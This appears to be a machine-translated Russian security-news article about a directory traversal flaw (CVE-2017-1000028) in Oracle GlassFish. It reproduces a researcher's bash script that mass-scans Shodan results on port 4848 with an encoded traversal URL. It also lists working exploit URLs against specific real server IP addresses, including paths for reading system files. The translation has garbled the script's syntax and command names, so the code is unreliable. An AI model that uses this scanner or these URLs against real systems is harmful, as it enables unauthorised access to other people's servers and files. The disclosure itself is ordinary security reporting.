Пятница, 26 февраля, 09:52
дома Исследования GlassFish Oracle: уязвимость предоставляет данные тысячам серверов по всему миру (анализ)

GlassFish Oracle: уязвимость предоставляет данные тысячам серверов по всему миру (анализ)

Уязвимость в GlassFish Oracle: Исследователь безопасности Димитрис Руссис анализирует нас как уязвимость к известным Сервер приложений Его GlassFish Oracle признан CVE-2017-1000028 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028) в настоящее время предоставляет данные тысячам серверов по всему миру.

Oracle GlassFish

Его эксплуатация вакуум безопасности позволяет читать тип атаки по каталогам всех файлов сервера, на которых установлен сервер приложений.

В анализе, проведенном исследователем, они сначала используют образцы серверов 300 через поисковую систему shodan, на которой установлена ​​версия GlashFish в версии 4.1.

Затем с помощью автоматизированного сценария, созданного исследователем, они проверяют, какой из серверов действительно существует. уязвимость.

#! / bin / bash # Получите 300 результатов от поисковой системы Shodan shodan search --limit 300 --fields ip_str GlassFish 4.1 port: 4848> servers_ip.txt # Сортировка IP cat servers_ip.txt | сорт -n -t. -k 1,1 -k 2,2 -k 3,3 -k 4,4> servers_sort.txt # Удалить все пробелы sed -r 's / \ s + // g' servers_sort.txt> servers.txt # Удалить временное Файлы rm servers_ip.txt rm servers_sort.txt # Список серверов input = "servers.txt" # Проверить сервер на уязвимость, пока IFS = read -r line do ip = $ line # http: // server_ip / theme / META-INF / ../../../../../../../../../../ url = "http: // $ line: 4848 / theme / META-INF /% c0 % ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae % c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0 % ae% c0% af% c0% ae% c0% ae% c0% af "echo -n" ip: $ line "fetch =` curl -s -o / dev / null --max-time 5 -w "% {http_code} "$ url`; if [$ fetch = 200] then echo "- Соединение успешно! Сервер уязвим" # Сохранить результат в weak_servers.txt echo "$ url" >> уязвимый_servers.txt else echo "- Соединение не удалось! Сервер не уязвим" fi done < "$ input"

Серверы

Конечным результатом скрипта является создание файла, содержащего ссылки (URL-адреса) немедленно использовать уязвимость.

Просматривая ссылки, включенные в файл браузер мы можем видеть все файлы в / корне Сервера.

Иллюстрация:

Windows сервер

http://52.25.200.71:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af

Oracle GlassFish

Linux сервер

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af

Серверы GlassFish Oracle

Теперь мы можем получить доступ к любому файлу, который хотим на сервере, добавив путь к файлу в конце URL-адреса.

Например,

/ и т.д./ passwd

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/fstab

 

/ Корень

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afroot

 

Вышеупомянутое исследование демонстрирует, с одной стороны, что уязвимость может привести к раскрытию данных в широком масштабе во всем мире, а с другой стороны, необходимость немедленного внедрения обновления программного обеспечения Системными администраторами.

Редакция SecNews искренне благодарит исследователя Димитриоса Руссиса за достоверную и своевременную информацию.

 

 

 

 

* Димитрис Руссис - сотрудник Лаборатории безопасности информационных систем Эгейского университета.

http://www.icsd.aegean.gr/group/members-data.php?group=L1&member=1652

ОСТАВИТЬ ОТВЕТ

Пожалуйста, введите ваш комментарий!
Пожалуйста, введите ваше имя здесь

ЖИВЫЕ НОВОСТИ

Оборонная промышленность: главная цель северокорейских хакеров!

С начала 2020 года хакерская группа «Lazarus», поддерживаемая Северной Кореей, нацелена на оборонную промышленность с помощью специального бэкдора ...

Голландский исследовательский совет: подтверждает атаку программ-вымогателей и утечку данных

Голландский исследовательский совет (NWO) подтвердил, что недавняя атака на киберпространство, вынудившая его отключить свои серверы ...

SpaceX Starship: первый пассажир проекта #dearMoon

2 марта первый гражданин, получивший билеты на первый космический корабль SpaceX, отправившийся на Луну, через #dearMoon ...

Wear OS: фраза "Окей, Google" не работает уже несколько месяцев.

Умные часы Wear OS внезапно перестали отвечать на команду «Окей, Google», не волнуйтесь, вы не единственный, кто сталкивается с этим ...

Telegram: автоматически удаляет сообщения таймера

Telegram выпускает новое обновление для приложений iOS и Android, которое предлагает такие функции, как автоматическое удаление сообщений, виджет чата ...

Google финансирует двух разработчиков, чтобы сосредоточиться на безопасности Linux

Linux более безопасен, чем большинство операционных систем, но это не значит, что его безопасность можно считать само собой разумеющимся.

ИИ может написать университетскую работу за 20 минут

ИИ может очень хорошо многое делать. Что-то, что может сделать относительно хорошо, - это написать университет ...

Kali Linux 2021.1 выпущен с новыми функциями!

Kali Linux закрылась в прошлом году выпуском v2020.4. Производитель Offensive Security анонсировал новый ...

NASA's Perseverance отправляет новое изображение с момента приземления на Марс

Одно из важнейших достижений в освоении космоса за последние годы - посадка на его поверхность марсохода Perseverance ...

Google: переключитесь на новое приложение Pay, чтобы получить к нему доступ

В прошлом году приложение Google Pay выпустило новый обновленный интерфейс, однако многие пользователи не выбрали его и остались в старом, поскольку у них ...